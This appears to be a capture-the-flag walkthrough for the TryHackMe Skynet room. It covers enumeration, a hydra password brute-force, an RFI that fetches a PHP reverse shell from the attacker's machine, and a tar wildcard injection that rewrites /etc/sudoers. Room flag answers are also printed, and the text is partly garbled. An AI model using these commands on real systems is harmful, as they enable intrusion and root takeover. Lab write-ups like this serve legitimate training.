π»πππ―ππππ΄π πΎππππ»ππππππ πΊπππππ
Sure, I can provide a general walkthrough for the Skynet room on TryHackMe. Hereβs a step-by-step guide:
Deploy the Machine :
Log in to your TryHackMe account and navigate to the Skynet room. Click on the βDeployβ button to spawn the virtual machine.
- Adding registries to your /etc/hosts file makes it easier for machines to remember and learn by their unique names rather than their IP addresses. It also helps in cases where a DNS resolution may not be available or reliable
1
echo "10.10.225.54 Skynet.thm" | sudo tee -a /etc/hosts
Enumeration:
Start by enumerating the services running on the machine using tools like Nmap.
Run a basic Nmap scan to discover open ports and services :
1
nmap -sCV <machine_IP>
Enumerate Web Service:
Once you have identified the open ports, check if thereβs a web service running. Visit the web service in your browser by navigating to http://
Examine the Website:
Look for any clues or hidden directories on the website. You can use tools like dirsearch for directory brute-forcing. Examine the page source for any hidden comments or JavaScript.
dirsearch :
smbclient :
We have connected to major small businesses using smbclient. To share on the device. Anonymous Miles Dyson.
1
smbclient -L skynet.thm
Content of attention.txt :
Content of log1.txt a password list :
Cracking Squirrelmail password :
You can do this easily using Burp Suite and hydra
1
hydra -l milesdyson -P log1.txt skynet.thm http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect" -t 20
Hydra :
Burp Suite :
We found it! Now we can log in :
Only the first looks to be important for us :
We found the password for smb, now we can login :
1
smbclient //$ip/milesdyson -U milesdyson
and we get access, inside are a lot of notes and files that we donβt necessary need, the only file that its usefull for us is important.txt
Inside we find the secret directory :
If we go to that directory we find a simple page, letβs run dirb to see if there are more hidden directories:
1
dirb http://10.10.167.117/45kra24zxs28v3yd/
We find /administrator if we go there we find that the page is running CuppaCMS, we can search for it on searchsploit:
sign in : Cuppa CMS
Exploitation :
We open searchsploit and search for the exploit in The CMS
Reading the text file for the exploit, we see that it is possible to read the Local files on the target machine by targeting the urlConfig parameter in the alertConfigField.php. The best part is that it doesnβt even warrant a login into the CMS.
we can read the /etc/passwd file on the target divice
1
http://target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=.../../../../../../../../../etc/passwd
We can get our reverse shell for revshells.com, select PHP PentestMonkey, enter your machine ip and the listening port (in my case I choose 1234), downloaded and put it inside a folder Start a http server in the folder where you downloaded your revshell:
1
python3 -m http.server
Start our listener :
After executing this on our browser, a reverse shell should be opened on our side
1
nc -lvnp 1337
Request the link :
1
http://skynet/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.224.219/php-reverse-shell.php
Now we get our reverse shell!
We can spawn a shell with python:
1
python -c 'import pty;pty.spawn("/bin/bash")'
we see that there is a photo user named Melideson. You Have highlighted the user within their home directory .
1
Answer: 7ce5c2109a40f958099283600a9ae807
Inside /home/milesdyson/backups we find a file backup.sh and see that every minutes a script is being executed, we can perfom a wildcard injection.
We run this commads, inside the folder /var/www/html:
1
2
3
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > pavan.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh pavan.sh"
echo "/var/www/html" > --checkpoint=1
1
And get the root shell, and then we can find the tag /root/root.txt
1
Answer: 3f0372db24753accc7179a282cd6a949